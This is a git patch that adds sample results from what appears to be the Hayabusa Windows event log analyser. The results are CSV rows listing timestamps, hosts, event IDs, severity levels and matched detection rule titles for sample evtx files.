From 4a73a8c66c29f14ad82b37d6fc9e8a87e475de7f Mon Sep 17 00:00:00 2001
From: Tanaka Zakku <71482215+YamatoSecurity@users.noreply.github.com>
Date: Wed, 22 Dec 2021 11:27:06 +0900
Subject: [PATCH] Sample results
---
...usa-sample-evtx-ResultsDefaultSettings.csv | 10073 +++++++++++
...sa-sample-evtx-ResultsDefaultSettings.xlsx | Bin 0 -> 583620 bytes
...-ResultsDeprecatedAndNoisyRulesEnabled.csv | 14207 ++++++++++++++++
...ResultsDeprecatedAndNoisyRulesEnabled.xlsx | Bin 0 -> 711827 bytes
4 files changed, 24280 insertions(+)
create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx
create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx
diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
new file mode 100644
index 00000000..0ae6f001
--- /dev/null
+++ b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
@@ -0,0 +1,10073 @@ +Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath +2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : 
SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate 
Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : 
Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
